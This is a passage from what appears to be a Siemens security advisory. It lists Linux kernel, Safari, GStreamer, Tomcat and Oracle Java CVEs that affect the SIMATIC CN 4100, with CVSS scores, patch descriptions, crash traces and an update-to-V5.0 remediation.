https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39843 In the Linux kernel, the following vulnerability has been resolved: mm: slub: avoid wake up kswapd in set_track_prepare set_track_prepare() can incur lock recursion. The issue is that it is called from hrtimer_start_range_ns holding the per_cpu(hrtimer_bases)[n].lock, but when enabled CONFIG_DEBUG_OBJECTS_TIMERS, may wake up kswapd in set_track_prepare, and try to hold the per_cpu(hrtimer_bases)[n].lock. Avoid deadlock caused by implicitly waking up kswapd by passing in allocation flags, which do not contain __GFP_KSWAPD_RECLAIM in the debug_objects_fill_pool() case. Inside stack depot they are processed by gfp_nested_mask(). Since ___slab_alloc() has preemption disabled, we mask out __GFP_DIRECT_RECLAIM from the flags there. The oops looks something like: BUG: spinlock recursion on CPU#3, swapper/3/0 lock: 0xffffff8a4bf29c80, .magic: dead4ead, .owner: swapper/3/0, .owner_cpu: 3 Hardware name: Qualcomm Technologies, Inc. Popsicle based on SM8850 (DT) Call trace: spin_bug+0x0 _raw_spin_lock_irqsave+0x80 hrtimer_try_to_cancel+0x94 task_contending+0x10c enqueue_dl_entity+0x2a4 dl_server_start+0x74 enqueue_task_fair+0x568 enqueue_task+0xac do_activate_task+0x14c ttwu_do_activate+0xcc try_to_wake_up+0x6c8 default_wake_function+0x20 autoremove_wake_function+0x1c __wake_up+0xac wakeup_kswapd+0x19c wake_all_kswapds+0x78 __alloc_pages_slowpath+0x1ac __alloc_pages_noprof+0x298 stack_depot_save_flags+0x6b0 stack_depot_save+0x14 set_track_prepare+0x5c ___slab_alloc+0xccc __kmalloc_cache_noprof+0x470 __set_page_owner+0x2bc post_alloc_hook[jt]+0x1b8 prep_new_page+0x28 get_page_from_freelist+0x1edc __alloc_pages_noprof+0x13c alloc_slab_page+0x244 allocate_slab+0x7c ___slab_alloc+0x8e8 kmem_cache_alloc_noprof+0x450 debug_objects_fill_pool+0x22c debug_object_activate+0x40 enqueue_hrtimer[jt]+0xdc hrtimer_start_range_ns+0x5f8 ... View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39844 In the Linux kernel, the following vulnerability has been resolved: mm: move page table sync declarations to linux/pgtable.h During our internal testing, we started observing intermittent boot failures when the machine uses 4-level paging and has a large amount of persistent memory: BUG: unable to handle page fault for address: ffffe70000000034 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: 0002 [#1] SMP NOPTI RIP: 0010:__init_single_page+0x9/0x6d Call Trace: __init_zone_device_page+0x17/0x5d memmap_init_zone_device+0x154/0x1bb pagemap_range+0x2e0/0x40f memremap_pages+0x10b/0x2f0 devm_memremap_pages+0x1e/0x60 dev_dax_probe+0xce/0x2ec [device_dax] dax_bus_probe+0x6d/0xc9 [... snip ...] It turns out that the kernel panics while initializing vmemmap (struct page array) when the vmemmap region spans two PGD entries, because the new PGD entry is only installed in init_mm.pgd, but not in the page tables of other tasks. And looking at __populate_section_memmap(): if (vmemmap_can_optimize(altmap, pgmap)) // does not sync top level page tables r = vmemmap_populate_compound_pages(pfn, start, end, nid, pgmap); else // sync top level page tables in x86 r = vmemmap_populate(start, end, nid, altmap); In the normal path, vmemmap_populate() in arch/x86/mm/init_64.c synchronizes the top level page table (See commit 9b861528a801 ("x86-64, mem: Update all PGDs for direct mapping and vmemmap mapping changes")) so that all tasks in the system can see the new vmemmap area. However, when vmemmap_can_optimize() returns true, the optimized path skips synchronization of top-level page tables. This is because vmemmap_populate_compound_pages() is implemented in core MM code, which does not handle synchronization of the top-level page tables. Instead, the core MM has historically relied on each architecture to perform this synchronization manually. We're not the first party to encounter a crash caused by not-sync'd top level page tables: earlier this year, Gwan-gyeong Mun attempted to address the issue [1] [2] after hitting a kernel panic when x86 code accessed the vmemmap area before the corresponding top-level entries were synced. At that time, the issue was believed to be triggered only when struct page was enlarged for debugging purposes, and the patch did not get further updates. It turns out that current approach of relying on each arch to handle the page table sync manually is fragile because 1) it's easy to forget to sync the top level page table, and 2) it's also easy to overlook that the kernel should not access the vmemmap and direct mapping areas before the sync. # The solution: Make page table sync more code robust and harder to miss To address this, Dave Hansen suggested [3] [4] introducing {pgd,p4d}_populate_kernel() for updating kernel portion of the page tables and allow each architecture to explicitly perform synchronization when installing top-level entries. With this approach, we no longer need to worry about missing the sync step, reducing the risk of future regressions. The new interface reuses existing ARCH_PAGE_TABLE_SYNC_MASK, PGTBL_P*D_MODIFIED and arch_sync_kernel_mappings() facility used by vmalloc and ioremap to synchronize page tables. pgd_populate_kernel() looks like this: static inline void pgd_populate_kernel(unsigned long addr, pgd_t *pgd, p4d_t *p4d) { pgd_populate(&init_mm, pgd, p4d); if (ARCH_PAGE_TABLE_SYNC_MASK & PGTBL_PGD_MODIFIED) arch_sync_kernel_mappings(addr, addr); } It is worth noting that vmalloc() and apply_to_range() carefully synchronizes page tables by calling p*d_alloc_track() and arch_sync_kernel_mappings(), and thus they are not affected by ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39845 In the Linux kernel, the following vulnerability has been resolved: x86/mm/64: define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() Define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() to ensure page tables are properly synchronized when calling p*d_populate_kernel(). For 5-level paging, synchronization is performed via pgd_populate_kernel(). In 4-level paging, pgd_populate() is a no-op, so synchronization is instead performed at the P4D level via p4d_populate_kernel(). This fixes intermittent boot failures on systems using 4-level paging and a large amount of persistent memory: BUG: unable to handle page fault for address: ffffe70000000034 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: 0002 [#1] SMP NOPTI RIP: 0010:__init_single_page+0x9/0x6d Call Trace: __init_zone_device_page+0x17/0x5d memmap_init_zone_device+0x154/0x1bb pagemap_range+0x2e0/0x40f memremap_pages+0x10b/0x2f0 devm_memremap_pages+0x1e/0x60 dev_dax_probe+0xce/0x2ec [device_dax] dax_bus_probe+0x6d/0xc9 [... snip ...] It also fixes a crash in vmemmap_set_pmd() caused by accessing vmemmap before sync_global_pgds() [1]: BUG: unable to handle page fault for address: ffffeb3ff1200000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: Oops: 0002 [#1] PREEMPT SMP NOPTI Tainted: [W]=WARN RIP: 0010:vmemmap_set_pmd+0xff/0x230 vmemmap_populate_hugepages+0x176/0x180 vmemmap_populate+0x34/0x80 __populate_section_memmap+0x41/0x90 sparse_add_section+0x121/0x3e0 __add_pages+0xba/0x150 add_pages+0x1d/0x70 memremap_pages+0x3dc/0x810 devm_memremap_pages+0x1c/0x60 xe_devm_add+0x8b/0x100 [xe] xe_tile_init_noalloc+0x6a/0x70 [xe] xe_device_probe+0x48c/0x740 [xe] [... snip ...] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39846 In the Linux kernel, the following vulnerability has been resolved: pcmcia: Fix a NULL pointer dereference in __iodyn_find_io_region() In __iodyn_find_io_region(), pcmcia_make_resource() is assigned to res and used in pci_bus_alloc_resource(). There is a dereference of res in pci_bus_alloc_resource(), which could lead to a NULL pointer dereference on failure of pcmcia_make_resource(). Fix this bug by adding a check of res. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39847 In the Linux kernel, the following vulnerability has been resolved: ppp: fix memory leak in pad_compress_skb If alloc_skb() fails in pad_compress_skb(), it returns NULL without releasing the old skb. The caller does: skb = pad_compress_skb(ppp, skb); if (!skb) goto drop; drop: kfree_skb(skb); When pad_compress_skb() returns NULL, the reference to the old skb is lost and kfree_skb(skb) ends up doing nothing, leading to a memory leak. Align pad_compress_skb() semantics with realloc(): only free the old skb if allocation and compression succeed. At the call site, use the new_skb variable so the original skb is not lost when pad_compress_skb() fails. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-772 Missing Release of Resource after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39848 In the Linux kernel, the following vulnerability has been resolved: ax25: properly unshare skbs in ax25_kiss_rcv() Bernard Pidoux reported a regression apparently caused by commit c353e8983e0d ("net: introduce per netns packet chains"). skb->dev becomes NULL and we crash in __netif_receive_skb_core(). Before above commit, different kind of bugs or corruptions could happen without a major crash. But the root cause is that ax25_kiss_rcv() can queue/mangle input skb without checking if this skb is shared or not. Many thanks to Bernard Pidoux for his help, diagnosis and tests. We had a similar issue years ago fixed with commit 7aaed57c5c28 ("phonet: properly unshare skbs in phonet_rcv()"). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39849 In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: sme: cap SSID length in __cfg80211_connect_result() If the ssid->datalen is more than IEEE80211_MAX_SSID_LEN (32) it would lead to memory corruption so add some bounds checking. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39853 In the Linux kernel, the following vulnerability has been resolved: i40e: Fix potential invalid access when MAC list is empty list_first_entry() never returns NULL - if the list is empty, it still returns a pointer to an invalid object, leading to potential invalid memory access when dereferenced. Fix this by using list_first_entry_or_null instead of list_first_entry. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39857 In the Linux kernel, the following vulnerability has been resolved: net/smc: fix one NULL pointer dereference in smc_ib_is_sg_need_sync() BUG: kernel NULL pointer dereference, address: 00000000000002ec PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP PTI CPU: 28 UID: 0 PID: 343 Comm: kworker/28:1 Kdump: loaded Tainted: G OE 6.17.0-rc2+ #9 NONE Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 Workqueue: smc_hs_wq smc_listen_work [smc] RIP: 0010:smc_ib_is_sg_need_sync+0x9e/0xd0 [smc] ... Call Trace: smcr_buf_map_link+0x211/0x2a0 [smc] __smc_buf_create+0x522/0x970 [smc] smc_buf_create+0x3a/0x110 [smc] smc_find_rdma_v2_device_serv+0x18f/0x240 [smc] ? smc_vlan_by_tcpsk+0x7e/0xe0 [smc] smc_listen_find_device+0x1dd/0x2b0 [smc] smc_listen_work+0x30f/0x580 [smc] process_one_work+0x18c/0x340 worker_thread+0x242/0x360 kthread+0xe7/0x220 ret_from_fork+0x13a/0x160 ret_from_fork_asm+0x1a/0x30 If the software RoCE device is used, ibdev->dma_device is a null pointer. As a result, the problem occurs. Null pointer detection is added to prevent problems. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39860 In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Fix use-after-free in l2cap_sock_cleanup_listen() syzbot reported the splat below without a repro. In the splat, a single thread calling bt_accept_dequeue() freed sk and touched it after that. The root cause would be the racy l2cap_sock_cleanup_listen() call added by the cited commit. bt_accept_dequeue() is called under lock_sock() except for l2cap_sock_release(). Two threads could see the same socket during the list iteration in bt_accept_dequeue(): CPU1 CPU2 (close()) ---- ---- sock_hold(sk) sock_hold(sk); lock_sock(sk) <-- block close() sock_put(sk) bt_accept_unlink(sk) sock_put(sk) <-- refcnt by bt_accept_enqueue() release_sock(sk) lock_sock(sk) sock_put(sk) bt_accept_unlink(sk) sock_put(sk) <-- last refcnt bt_accept_unlink(sk) <-- UAF Depending on the timing, the other thread could show up in the "Freed by task" part. Let's call l2cap_sock_cleanup_listen() under lock_sock() in l2cap_sock_release(). [0]: BUG: KASAN: slab-use-after-free in debug_spin_lock_before kernel/locking/spinlock_debug.c:86 [inline] BUG: KASAN: slab-use-after-free in do_raw_spin_lock+0x26f/0x2b0 kernel/locking/spinlock_debug.c:115 Read of size 4 at addr ffff88803b7eb1c4 by task syz.5.3276/16995 CPU: 3 UID: 0 PID: 16995 Comm: syz.5.3276 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 Call Trace: __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xcd/0x630 mm/kasan/report.c:482 kasan_report+0xe0/0x110 mm/kasan/report.c:595 debug_spin_lock_before kernel/locking/spinlock_debug.c:86 [inline] do_raw_spin_lock+0x26f/0x2b0 kernel/locking/spinlock_debug.c:115 spin_lock_bh include/linux/spinlock.h:356 [inline] release_sock+0x21/0x220 net/core/sock.c:3746 bt_accept_dequeue+0x505/0x600 net/bluetooth/af_bluetooth.c:312 l2cap_sock_cleanup_listen+0x5c/0x2a0 net/bluetooth/l2cap_sock.c:1451 l2cap_sock_release+0x5c/0x210 net/bluetooth/l2cap_sock.c:1425 __sock_release+0xb3/0x270 net/socket.c:649 sock_close+0x1c/0x30 net/socket.c:1439 __fput+0x3ff/0xb70 fs/file_table.c:468 task_work_run+0x14d/0x240 kernel/task_work.c:227 resume_user_mode_work include/linux/resume_user_mode.h:50 [inline] exit_to_user_mode_loop+0xeb/0x110 kernel/entry/common.c:43 exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline] syscall_exit_to_user_mode_work include/linux/entry-common.h:175 [inline] syscall_exit_to_user_mode include/linux/entry-common.h:210 [inline] do_syscall_64+0x3f6/0x4c0 arch/x86/entry/syscall_64.c:100 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f2accf8ebe9 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffdb6cb1378 EFLAGS: 00000246 ORIG_RAX: 00000000000001b4 RAX: 0000000000000000 RBX: 00000000000426fb RCX: 00007f2accf8ebe9 RDX: 0000000000000000 RSI: 000000000000001e RDI: 0000000000000003 RBP: 00007f2acd1b7da0 R08: 0000000000000001 R09: 00000012b6cb166f R10: 0000001b30e20000 R11: 0000000000000246 R12: 00007f2acd1b609c R13: 00007f2acd1b6090 R14: ffffffffffffffff R15: 00007ffdb6cb1490 Allocated by task 5326: kasan_save_stack+0x33/0x60 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:388 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:405 kasan_kmalloc include/linux/kasan.h:260 [inline] __do_kmalloc_node mm/slub.c:4365 [inline] __kmalloc_nopro ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-39864 In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: fix use-after-free in cmp_bss() Following bss_free() quirk introduced in commit 776b3580178f ("cfg80211: track hidden SSID networks properly"), adjust cfg80211_update_known_bss() to free the last beacon frame elements only if they're not shared via the corresponding 'hidden_beacon_bss' pointer. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39865 In the Linux kernel, the following vulnerability has been resolved: tee: fix NULL pointer dereference in tee_shm_put tee_shm_put have NULL pointer dereference: __optee_disable_shm_cache --> shm = reg_pair_to_ptr(...);//shm maybe return NULL tee_shm_free(shm); --> tee_shm_put(shm);//crash Add check in tee_shm_put to fix it. panic log: Unable to handle kernel paging request at virtual address 0000000000100cca Mem abort info: ESR = 0x0000000096000004 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x04: level 0 translation fault Data abort info: ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 CM = 0, WnR = 0, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=0000002049d07000 [0000000000100cca] pgd=0000000000000000, p4d=0000000000000000 Internal error: Oops: 0000000096000004 [#1] SMP CPU: 2 PID: 14442 Comm: systemd-sleep Tainted: P OE ------- ---- 6.6.0-39-generic #38 Source Version: 938b255f6cb8817c95b0dd5c8c2944acfce94b07 Hardware name: greatwall GW-001Y1A-FTH, BIOS Great Wall BIOS V3.0 10/26/2022 pstate: 80000005 (Nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : tee_shm_put+0x24/0x188 lr : tee_shm_free+0x14/0x28 sp : ffff001f98f9faf0 x29: ffff001f98f9faf0 x28: ffff0020df543cc0 x27: 0000000000000000 x26: ffff001f811344a0 x25: ffff8000818dac00 x24: ffff800082d8d048 x23: ffff001f850fcd18 x22: 0000000000000001 x21: ffff001f98f9fb88 x20: ffff001f83e76218 x19: ffff001f83e761e0 x18: 000000000000ffff x17: 303a30303a303030 x16: 0000000000000000 x15: 0000000000000003 x14: 0000000000000001 x13: 0000000000000000 x12: 0101010101010101 x11: 0000000000000001 x10: 0000000000000001 x9 : ffff800080e08d0c x8 : ffff001f98f9fb88 x7 : 0000000000000000 x6 : 0000000000000000 x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 x2 : ffff001f83e761e0 x1 : 00000000ffff001f x0 : 0000000000100cca Call trace: tee_shm_put+0x24/0x188 tee_shm_free+0x14/0x28 __optee_disable_shm_cache+0xa8/0x108 optee_shutdown+0x28/0x38 platform_shutdown+0x28/0x40 device_shutdown+0x144/0x2b0 kernel_power_off+0x3c/0x80 hibernate+0x35c/0x388 state_store+0x64/0x80 kobj_attr_store+0x14/0x28 sysfs_kf_write+0x48/0x60 kernfs_fop_write_iter+0x128/0x1c0 vfs_write+0x270/0x370 ksys_write+0x6c/0x100 __arm64_sys_write+0x20/0x30 invoke_syscall+0x4c/0x120 el0_svc_common.constprop.0+0x44/0xf0 do_el0_svc+0x24/0x38 el0_svc+0x24/0x88 el0t_64_sync_handler+0x134/0x150 el0t_64_sync+0x14c/0x15 View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-39866 In the Linux kernel, the following vulnerability has been resolved: fs: writeback: fix use-after-free in __mark_inode_dirty() An use-after-free issue occurred when __mark_inode_dirty() get the bdi_writeback that was in the progress of switching. CPU: 1 PID: 562 Comm: systemd-random- Not tainted 6.6.56-gb4403bd46a8e #1 ...... pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __mark_inode_dirty+0x124/0x418 lr : __mark_inode_dirty+0x118/0x418 sp : ffffffc08c9dbbc0 ........ Call trace: __mark_inode_dirty+0x124/0x418 generic_update_time+0x4c/0x60 file_modified+0xcc/0xd0 ext4_buffered_write_iter+0x58/0x124 ext4_file_write_iter+0x54/0x704 vfs_write+0x1c0/0x308 ksys_write+0x74/0x10c __arm64_sys_write+0x1c/0x28 invoke_syscall+0x48/0x114 el0_svc_common.constprop.0+0xc0/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x40/0xe4 el0t_64_sync_handler+0x120/0x12c el0t_64_sync+0x194/0x198 Root cause is: systemd-random-seed kworker ---------------------------------------------------------------------- ___mark_inode_dirty inode_switch_wbs_work_fn spin_lock(&inode->i_lock); inode_attach_wb locked_inode_to_wb_and_lock_list get inode->i_wb spin_unlock(&inode->i_lock); spin_lock(&wb->list_lock) spin_lock(&inode->i_lock) inode_io_list_move_locked spin_unlock(&wb->list_lock) spin_unlock(&inode->i_lock) spin_lock(&old_wb->list_lock) inode_do_switch_wbs spin_lock(&inode->i_lock) inode->i_wb = new_wb spin_unlock(&inode->i_lock) spin_unlock(&old_wb->list_lock) wb_put_many(old_wb, nr_switched) cgwb_release old wb released wb_wakeup_delayed() accesses wb, then trigger the use-after-free issue Fix this race condition by holding inode spinlock until wb_wakeup_delayed() finished. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-40300 In the Linux kernel, the following vulnerability has been resolved: x86/vmscape: Add conditional IBPB mitigation VMSCAPE is a vulnerability that exploits insufficient branch predictor isolation between a guest and a userspace hypervisor (like QEMU). Existing mitigations already protect kernel/KVM from a malicious guest. Userspace can additionally be protected by flushing the branch predictors after a VMexit. Since it is the userspace that consumes the poisoned branch predictors, conditionally issue an IBPB after a VMexit and before returning to userspace. Workloads that frequently switch between hypervisor and userspace will incur the most overhead from the new IBPB. This new IBPB is not integrated with the existing IBPB sites. For instance, a task can use the existing speculation control prctl() to get an IBPB at context switch time. With this implementation, the IBPB is doubled up: one at context switch and another before running userspace. The intent is to integrate and optimize these cases post-embargo. [ dhansen: elaborate on suboptimal IBPB solution ] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-402 Transmission of Private Resources into a New Sphere ('Resource Leak') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N CVE-2025-43368 A use-after-free issue was addressed with improved memory management. This issue is fixed in Safari 26, iOS 26 and iPadOS 26, macOS Tahoe 26. Processing maliciously crafted web content may lead to an unexpected Safari crash. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L CVE-2025-47219 In GStreamer through 1.26.1, the isomp4 plugin's qtdemux_parse_trak function may read past the end of a heap buffer while parsing an MP4 file, possibly leading to information disclosure. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2025-48989 Improper Resource Shutdown or Release vulnerability in Apache Tomcat made Tomcat vulnerable to the made you reset attack. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.9, from 10.1.0-M1 through 10.1.43 and from 9.0.0.M1 through 9.0.107. Older, EOL versions may also be affected. Users are recommended to upgrade to one of versions 11.0.10, 10.1.44 or 9.0.108 which fix the issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-404 Improper Resource Shutdown or Release Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-53057 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-284 Improper Access Control Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2025-53066 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in 